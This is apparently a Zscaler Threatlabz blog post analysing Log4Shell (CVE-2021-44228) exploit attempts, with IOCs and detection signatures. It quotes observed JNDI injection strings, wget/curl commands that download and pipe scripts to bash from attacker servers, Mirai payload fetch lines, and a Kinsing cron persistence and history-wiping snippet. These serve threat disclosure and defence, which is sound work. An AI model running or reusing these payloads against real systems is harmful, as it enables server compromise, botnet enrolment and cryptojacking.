Threatlabz analysis - Log4shell CVE-2021-44228 exploit attempts

Zscaler Threatlabz team has been actively monitoring the exploit attempts related to the Apache log4j 0-day Remote Code Execution Vulnerability (CVE-2021-44228) also known as “Log4Shell”. In this blog we will share our analysis of the exploit payloads being delivered using this vulnerability. We will continue to update this blog and share more details as we uncover them during our analysis.

The Threatlabz team had also published a Security Advisory related to this vulnerability.

What is causing this vulnerability?

There is a flaw in the Log4j utility (version 2.0 to 2.15) where an attacker can control log message parameters to execute arbitrary code loaded from various JNDI endpoints such as LDAP, LDAPS, RMI, DNS, etc.

Log4j Exploit chain

The attacker sends maliciously crafted HTTP requests to the web application server running the vulnerable Log4j utility. Once the request is received Log4j tries to load the JNDI resource from an attacker controlled server and depending upon the type of protocol used, loads additional components. These components can include a shell script or a java class that can write a file to disk or memory and executes the final payload.

We have observed multiple botnets including Mirai and Kinsing (cryptomining) leveraging this log4j exploit to target vulnerable servers on the Internet… In addition to Mirai and Kinsing families, we have also seen reports of CobaltStrike and ransomware related activity from these exploits.

Exploit Commands Observed

		${jndi:ldap://45.137.21.9:1389/Basic/Command/Base64/d2dldCBodHRwOi8vNjIuMjEwLjEzMC4yNTAvbGguc2g7...
		> wget http://62.210.130[.]250/lh.sh;chmod +x lh.sh;./lh.sh
		
		${jndi:ldap://45.137.21.9:1389/Basic/Command/Base64/d2dldCAtcSAtTy0gaHR0cDovLzYyLjIxMC4xMzAuMj...
		> wget -q -O- http://62.210.130[.]250/lh.sh|bash
		
		${jndi:ldap://92.242.40.21:5557/Basic/Command/Base64/KGN1cmwgLXMgOTIuMjQyLjQwLjIxL2xoLnNofHx3...
		> (curl -s 92.242.40[.]21/lh.sh||wget -q -O- 92.242.40[.]21/lh.sh)

Threat actors also appear to be leveraging network fingerprinting technique before serving stage 2 payloads.

The injected command will include victim server IP/Port information that will be checked before serving malicious payloads as seen below.

		${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1Lj…
		> (curl -s 45.155.205[.]233:5874/<VICTIME-IP:PORT>||wget -q -O- 45.155.205[.]233:5874/<VICTIME-IP:PORT>)|bash

Payload analysis

#1 Mirai Botnet

Shell Script lh.sh (MD5: cf2ce888781958e929be430de173a0f8) is downloaded from 62.210.130[.]250 (attacker server). This bash script when executed will further download multiple linux binary payloads on the victim machine. The script also sets execute permission for the downloaded payloads and runs them.

		wget http://62.210.130[.]250/web/admin/x86;chmod +x x86;./x86 x86;
		wget http://62.210.130[.]250/web/admin/x86_g;chmod +x x86_g;./x86_g x86_g;
		wget http://62.210.130[.]250/web/admin/x86_64;chmod +x x86_64;./x86_g x86_64;

All of these binaries belong to the Mirai botnet family and share the same code structure. They are compiled for different architectures - x86 32-bit, 64-bit. There is no code to check the architecture, instead the attacker intends to run all binaries hoping one of them will be successful.

These Mirai binaries were configured to communicate with C2 domain nazi[.]uy on port 25565 and are capable of supporting following commands from the Attacker:

UDP flood
SYN flood
ACK flood
TCP stomp flood
GRE IP flood
Connect flood

#2 Kinsing Malware

Shell Script lh2.sh (MD5: 0579a8907f34236b754b07331685d79e) is downloaded from 92.242.40[.]21/lh2.sh it belongs to the Kinsing malware family which essentially is a coinminer with rootkit capabilities.

The stage 1 bash script (lh2.sh) will stop and disable multiple security processes on the victim server before downloading the Kinsing binary. This is to ensure that the malicious payload is not detected and blocked from execution.

Kinsing is a Golang based coin miner as shown below:

		92.242.40.21_kinsing: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, Go BuildID=DhskS7dCbYzdqxBh_mSk/76qVIoHRKN1NNcfL8ADh/W157t201-UbEisb9Xatk/hOMqvN1a69kKMwHq_e_v, stripped

The bash script will also establish persistence by adding a cronjob that will periodically download and execute updated versions of the bash script from a remote location.

Persistence

		if [ $? -eq 0 ]; then
		echo "cron good"
		else
		(
		  crontab -l 2>/dev/null
		  echo "* * * * * $LDR http://185.191.32[.]198/lh.sh | sh > /dev/null 2>&1"
		) | crontab -
		fi

		history -c

		rm -rf ~/.bash_history

		history -c

Here, $LDR value is derived from the victim environment and can either be “wget -q -O -” or “curl”

185.191.32[.]198/lh.sh downloads and executes the latest Kinsing binary but from 80.71.158[.]12/kinsing

More updates to follow.

Zscaler Detections

		ThreatName
		
		
		DetectionID
		
		
		Type Of Detection
		
	
	
		
		Apache.Exploit.CVE-2021-44228
		
		
		47673
		
		
		IPS Web - User-Agent
		
	
	
		
		Apache.Exploit.CVE-2021-44228
		
		
		47674
		
		
		IPS Web - User-Agent
		
	
	
		
		Apache.Exploit.CVE-2021-44228
		
		
		47675
		
		
		IPS Web - User-Agent
		
	
	
		
		Apache.Exploit.CVE-2021-44228
		
		
		47676
		
		
		IPS Web - User-Agent
		
	
	
		
		Apache.Exploit.CVE-2021-44228
		
		
		47677
		
		
		IPS Web - User-Agent
		
	
	
		
		Apache.Exploit.CVE-2021-44228
		
		
		47707
		
		
		IPS Web - URL
		
	
	
		
		Apache.Exploit.CVE-2021-44228
		
		
		47708
		
		
		IPS Web - User-Agent
		
	
	
		
		Apache.Exploit.CVE-2021-44228
		
		
		47711
		
		
		IPS Web - User-Agent
		
	
	
		
		Apache.Exploit.CVE-2021-44228
		
		
		47801
		
		
		IPS Web - User-Agent
		
	
	
		
		Apache.Exploit.CVE-2021-44228
		
		
		124803
		
		
		File-Content (Yara)
		
	
	
		
		Apache.Exploit.CVE-2021-44228
		
		
		-
		
		
		FIle Reputation
		
	
	
		
		Linux.Trojan.Mirai
		
		
		-
		
		
		File Reputation
		
	
	
		
		Linux.Trojan.Mirai.LZ
		
		
		-
		
		
		URL Reputation
		
	
	
		
		Linux.Rootkit.Kinsing
		
		
		-
		
		
		File Reputation
		
	
	
		
		Linux.Rootkit.Kinsing.LZ
		
		
		-
		
		
		URL Reputation

Indicators Of Compromise

Mirai Samples
40e3b969906c1a3315e821a8461216bb
6d275af23910c5a31b2d9684bbb9c6f3
1348a00488a5b3097681b6463321d84c

Mirai C2
nazi[.]uy

Mirai Download URLs
62.210.130[.]250/web/admin/x86
62.210.130[.]250/web/admin/x86_g
62.210.130[.]250/web/admin/x86_64

Kinsing Samples
648effa354b3cbaad87b45f48d59c616

Kinsing Shell Scripts
92.242.40[.]21/lh2.sh
80.71.158[.]12.lh.sh

Kinsing Download URLs
92.242.40[.]21/kinsing
80.71.158[.]12/kinsing

Persistence
185.191.32[.]198/lh.sh

Top Exploit Server IPs
37.233.99[.]127:1389
45.137.21[.]9:1389
45.155.205[.]233:12344
45.155.205[.]233:5874
45.137.21[.]9:1389
92.242.40[.]21:5557

References

https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/apache-releases-log4j-version-2150-address-critical-rce
https://www.trendmicro.com/en_us/research/20/k/analysis-of-kinsing-malwares-use-of-rootkit.html
https://blog.netlab.360.com/threat-alert-log4j-vulnerability-has-been-adopted-by-two-linux-botnets/

Article Link: Threatlabz analysis - Log4shell CVE-2021-44228 exploit attempts | Zscaler